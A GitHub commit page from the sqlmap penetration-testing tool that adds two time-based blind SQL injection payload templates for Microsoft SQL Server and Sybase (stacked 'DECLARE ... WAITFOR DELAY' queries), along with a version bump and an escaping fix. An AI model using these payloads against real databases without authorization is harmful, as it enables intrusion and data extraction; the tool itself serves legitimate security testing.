Skip to content

Commit cb170f1

Browse files
stamparmstamparm
committed
Implements sqlmapproject#3780 
1 parent 5650e1a commit cb170f1

File tree

3 files changed

+46
-3
lines changed

3 files changed

+46
-3
lines changed

data/xml/payloads/stacked_queries.xml

Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -268,6 +268,28 @@
268268
</details>
269269
</test>
270270

271+
<test>
272+
<title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
273+
<stype>4</stype>
274+
<level>2</level>
275+
<risk>1</risk>
276+
<clause>1-8</clause>
277+
<where>1</where>
278+
<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
279+
<request>
280+
<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
281+
<comment>--</comment>
282+
</request>
283+
<response>
284+
<time>[SLEEPTIME]</time>
285+
</response>
286+
<details>
287+
<dbms>Microsoft SQL Server</dbms>
288+
<dbms>Sybase</dbms>
289+
<os>Windows</os>
290+
</details>
291+
</test>
292+
271293
<test>
272294
<title>Microsoft SQL Server/Sybase stacked queries</title>
273295
<stype>4</stype>
@@ -289,6 +311,27 @@
289311
</details>
290312
</test>
291313

314+
<test>
315+
<title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
316+
<stype>4</stype>
317+
<level>5</level>
318+
<risk>1</risk>
319+
<clause>1-8</clause>
320+
<where>1</where>
321+
<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
322+
<request>
323+
<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
324+
</request>
325+
<response>
326+
<time>[SLEEPTIME]</time>
327+
</response>
328+
<details>
329+
<dbms>Microsoft SQL Server</dbms>
330+
<dbms>Sybase</dbms>
331+
<os>Windows</os>
332+
</details>
333+
</test>
334+
292335
<test>
293336
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
294337
<stype>4</stype>

lib/core/settings.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
from thirdparty.six import unichr as _unichr
1919

2020
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
21-
VERSION = "1.3.6.53"
21+
VERSION = "1.3.6.54"
2222
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2323
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2424
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -420,7 +420,7 @@
420420
MAX_ERROR_CHUNK_LENGTH = 1024
421421

422422
# Do not escape the injected statement if it contains any of the following SQL keywords
423-
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
423+
EXCLUDE_UNESCAPE = ("WAITFOR DELAY '", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
424424

425425
# Mark used for replacement of reflected values
426426
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"

plugins/generic/syntax.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -26,7 +26,7 @@ def _escape(expression, quote=True, escaper=None):
2626
if quote:
2727
for item in re.findall(r"'[^']*'+", expression):
2828
original = item[1:-1]
29-
if original:
29+
if original and re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. '[SLEEPTIME]' marker
3030
replacement = escaper(original) if not conf.noEscape else original
3131

3232
if replacement != original:

0 commit comments

Comments
 (0)